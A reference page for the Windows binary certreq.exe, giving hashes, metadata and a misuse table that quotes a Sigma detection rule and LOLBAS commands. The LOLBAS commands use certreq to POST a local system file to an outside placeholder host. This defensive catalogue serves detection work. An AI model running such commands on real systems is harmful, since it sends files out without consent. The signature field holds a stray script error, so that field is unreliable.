certreq.exe

  • File Path: C:\windows\system32\certreq.exe
  • Description: CertReq.exe

Hashes

Type Hash
MD5 4880B02DCFFE654496BD4A1FFEA522A6
SHA1 1CE25B5CB40CCE0EFAD553D1C8D03C670F74D1D9
SHA256 1A1A92010AAEF7107236879A992B3ACBF666F406AD063E1D3BB42D986D55F546
SHA384 0113B5CD7A07150E7C11D1A0EFA692DDFA6596C5EEC494E0FD0994F04FF974424F3430A6830D818B467DA3E9BEC559EE
SHA512 C478311B3D3AA964741F726B0BFDF71D1C6F92D791586599DB266EDCF57669C8B03612CE06E2458923D0EFB9A3F5762C399C41D398E550F36350060E56AE4A90
SSDEEP 6144:xUJwZwgr3CZKasZSzR147rMO9GfD7y8M0vDGf1j5WaplRnJfSuap:xZfrgSC48O9GfD7yLwDGl5Wa5Jf

Signature

  • Status: The file C:\windows\system32\certreq.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: CertReq.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | proc_creation_win_susp_certreq_download.yml | title: Suspicious Certreq Command to Download | DRL 1.0 |
| sigma | proc_creation_win_susp_certreq_download.yml | description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files | DRL 1.0 |
| sigma | proc_creation_win_susp_certreq_download.yml | - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ | DRL 1.0 |
| sigma | proc_creation_win_susp_certreq_download.yml | Image\|endswith: '\certreq.exe' | DRL 1.0 |
| LOLBAS | Certreq.yml | Name: CertReq.exe | |
| LOLBAS | Certreq.yml | - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt | |
| LOLBAS | Certreq.yml | - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal | |
| LOLBAS | Certreq.yml | - Path: C:\Windows\System32\certreq.exe | |
| LOLBAS | Certreq.yml | - Path: C:\Windows\SysWOW64\certreq.exe | |
| LOLBAS | Certreq.yml | - IOC: certreq creates new files | |
| LOLBAS | Certreq.yml | - IOC: certreq makes POST requests | |
| LOLBAS | Certreq.yml | - Link: https://dtm.uk/certreq | |

MIT License. Copyright (c) 2020-2021 Strontic.